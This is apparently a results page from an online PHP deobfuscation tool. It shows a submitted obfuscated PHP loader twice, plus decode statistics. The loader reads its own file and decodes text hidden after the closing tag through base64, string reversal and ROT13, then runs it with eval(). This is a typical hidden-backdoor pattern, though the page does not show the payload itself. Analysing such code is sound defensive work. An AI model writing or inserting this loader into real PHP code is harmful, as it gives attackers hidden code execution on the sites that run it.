Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $L66Rgr = explode(base64_decode("Pz4="), file_get_contents(__FILE__)); $L6CRgr = [..
Decoded Output download
<?php
$L66Rgr = explode(base64_decode("Pz4="), file_get_contents(__FILE__));
$L6CRgr = [
base64_decode("L3gvaQ=="), // '/x/i'
base64_decode("eA=="), // 'x'
base64_decode(strrev(str_rot13($L66Rgr[1]))), // 'd6d666e70e43a3aeaec1be01341d9f9d'
];
$L7CRgr = "d6d666e70e43a3aeaec1be01341d9f9d";
preg_replace($L6CRgr[0], serialize(eval($L6CRgr[2])), $L6CRgr[1]);
exit();
?>
Did this file decode correctly?
Original Code
<?php
$L66Rgr = explode(base64_decode("Pz4="), file_get_contents(__FILE__));
$L6CRgr = [
base64_decode("L3gvaQ=="), // '/x/i'
base64_decode("eA=="), // 'x'
base64_decode(strrev(str_rot13($L66Rgr[1]))), // 'd6d666e70e43a3aeaec1be01341d9f9d'
];
$L7CRgr = "d6d666e70e43a3aeaec1be01341d9f9d";
preg_replace($L6CRgr[0], serialize(eval($L6CRgr[2])), $L6CRgr[1]);
exit();
?>
Function Calls
None |
Stats
MD5 | 510453298587b25049a82efa4b912c15 |
Eval Count | 0 |
Decode Time | 33 ms |